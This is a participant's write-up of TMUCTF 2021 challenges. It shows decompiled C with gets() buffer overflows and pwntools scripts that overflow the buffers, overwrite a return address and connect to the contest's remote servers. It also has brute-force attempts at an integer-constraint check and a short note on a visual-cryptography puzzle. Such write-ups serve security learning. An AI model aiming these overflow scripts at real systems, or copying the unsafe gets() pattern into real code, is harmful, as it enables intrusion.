TMUCTF 2021

Pwn

Warmup [50 pts]

Description

Just a simple warmup!

nc 194.5.207.56 7000, nc 185.239.107.54 7000

int main() {
  char local_58 [76];
  int local_c;
  
  setbuf(stdout,(char *)0x0);
  setbuf(stdin,(char *)0x0);
  setbuf(stderr,(char *)0x0);
  tmulogo();
  puts("Welcome to TMUCTF 2021! Let us know your name: ");
  local_c = 0;
  gets(local_58);
  puts("Thanks!\n");
  if (local_c != 0) {
    system("cat flag.txt");
  }
  return 0;
}

Solution

This is the first thing you learn when opening a book for reverse engineering/pwn. A buffer overflow to access the flag.

from pwn import *

payload = b"A" * 78
#binary = process("./warmup")
binary = remote("194.5.207.56",  7000)
print(binary.recvuntil(bytes("name:", "utf-8")))
binary.sendline(payload)
binary.interactive()

Flag: TMUCTF{??????}

Baby Pwn [50 pts]

Description

Can you get the flag?

nc 194.5.207.56 7010, nc 185.239.107.54 7010

Decompiled Code

int main(void) {
  char name [28];
  int local_c;
  
  setbuf(stdout,(char *)0x0);
  setbuf(stderr,(char *)0x0);
  setbuf(stdin,(char *)0x0);
  tmulogo();
  local_c = 0;
  puts("Hi, Please enter your name: ");
  gets(name);
  if (local_c == 0xcafe) {
    helloUser(name);
  }
  return 0;
}

void helloUser(undefined8 param_1) {
  char local_88 [128];
  
  printf("Nice to meet you %s!\n",param_1);
  puts("Tell me about yourself ;;)");
  gets(local_88);
  puts("It was a pleasure meeting you.");
  return;
}

Solution

This is a common warmup problem that appears in CTF so I went through it easily. Well sort of. I grabbed some past code and found in the source what I am doing. I did everything right except it wasn't printing out the flag. Later on, another member looked over it and found that my address was completely wrong and that was a simple fix was all it took. The Code is below.

from pwn import *
import time

addr1 = 0xcafe
flag_os = 0x4012f0
payload = b"A" * 28
payload2 = b"A" * 128
newline = bytes('\n', 'utf-8')

#binary = process("./babypwn")
binary = remote('194.5.207.56', 7010)
print(binary.recvuntil(bytes("name:", "utf-8")))
binary.sendline(payload + p64(addr1))
# Makes it to Hello User
print(binary.recvuntil(bytes(")", "utf-8")))
# Get to here
binary.sendline(payload2 + p64(flag_os) + p64(flag_os))
binary.interactive()

Flag: TMUCTF{??????}

Are you admin [198 pts] [Not Solved]

Description

Just admin can get the flag! Note that the admin likes integers!

nc 194.5.207.113 7020, nc 185.97.117.19 7020

int main(void) {
  int iVar1;
  char local_128 [128];
  char password [64];
  char user [64];
  FILE *local_28;
  int num1;
  int num2;
  int num3;
  int num4;
  int num5;
  
  setbuf(stdout,(char *)0x0);
  setbuf(stderr,(char *)0x0);
  setbuf(stdin,(char *)0x0);
  tmulogo();
  num5 = 0;
  num4 = 0;
  num3 = 0;
  num2 = 0;
  num1 = 0;
  puts("Enter username:");
  gets(user);
  puts("Enter password:");
  gets(password);
  iVar1 = strcmp(user,"AlexTheUser");
  if ((((iVar1 == 0) && (iVar1 = strcmp(password,"4l3x7h3p455w0rd"), iVar1 == 0)) &&
      (num3 + num5 * num4 == 0x253f)) &&
     (((num2 + num4 * num3 == 0x37a2 && (num1 + num3 * num2 == 0x16d3)) &&
      ((num5 + num2 * num1 == 0x1bc9 && (num4 + num1 * num5 == 0x703f)))))) {
    local_28 = fopen("flag.txt","r");
    if (local_28 == (FILE *)0x0) {
      printf("Missing flag.txt. Contact an admin if you see this on remote.");
                    /* WARNING: Subroutine does not return */
      exit(1);
    }
    fgets(local_128,0x80,local_28);
    printf("%s",local_128);
  }
  return 0;
}

Solution

from pwn import *


user = bytes("AlexTheUser", "utf-8")
password = bytes("4l3x7h3p455w0rd", "utf-8")
#print(len(p64(flag_address)))
#binary = process("./areyouadmin")
#binary.close()
binary = remote("194.5.207.113",  7020)
print(binary.recvuntil(bytes("username:", "utf-8")))
binary.sendline(user)
print(binary.recvuntil(bytes("password:", "utf-8")))
binary.sendline(password)
#binary.sendline(payload + p64(flag_address))
#binary.interactive()
binary.close()
print("made it to the numbers")

"""
top = 233
found = False
i1 = 0
i4 = 0
i5 = 0
while not found:
	for i2 in range(100, top):
		for i3 in range(100, top):
			i1 = (-1 * i3 * i2) + 0x16d3
			i4 = (0x37a2 - i2) / i3
			# Using New Known
			i5 = (0x253f - i3) / i4
			if (i5 + i2 * i1) == 0x1bc9:
				print(i1, i2, i3, i4, i5)
			if (i4 + i1 * i5) == 0x703f:
				print(i1, i2, i3, i4, i5)
				

				
"""		
# 233 30 187 76 123		

"""
  if (((num3 + num5 * num4 == 0x253f)) &&
     (((num2 + num4 * num3 == 0x37a2 && (num1 + num3 * num2 == 0x16d3)) &&
      ((num5 + num2 * num1 == 0x1bc9 && (num4 + num1 * num5 == 0x703f)))))) {
"""
"""
top = 100
for i1 in range(0 , 100):
	print(i1)
	for i2 in range(0 , 10000):
		for i3 in range(28, 32):
			for i4 in range(90, 100):
				for i5 in range(90, 100):
					if (i3 + i5 * i4 == 9535):
						if(i2 + i4 * i3 == 14242):
							print(i2, i3, i4)
							if(i1 + i3 * i2 == 5843):
								if (i5 + i2 * i1 == 7113):
									if (i4 + i1 * i5 == 28735):
										print(i1, i2, i3, i4, i5)
										
"""
# Original Guess = 9535 14242 5843 7113 28735

#num1 + num3 * num2 == 0x16d3
#num3 + num5 * num4 == 0x253f
#num2 + num4 * num3 == 0x37a2
#num5 + num2 * num1 == 0x1bc9
#num4 + num1 * num5 == 0x703f

Welcome

Warmup [50 pts]

Description

A fun visual cryptography tool will amaze your kids!

Note: Remember the flag format is TMUCTF{...}.

111KB

secret.png

image

Image1

111KB

ciphered_message.png

image

Image2

Solution

Notice a small difference in the two file sizes. I was like hmmm let me see what would happen if I combine the images. I overlayed one on top of the other one and got the final image of the flag.

Flag: TMUCTF{W3_h0p3_y0u_3nj0y_7h15_c0mp371710n_4nd_7h4nk_y0u!}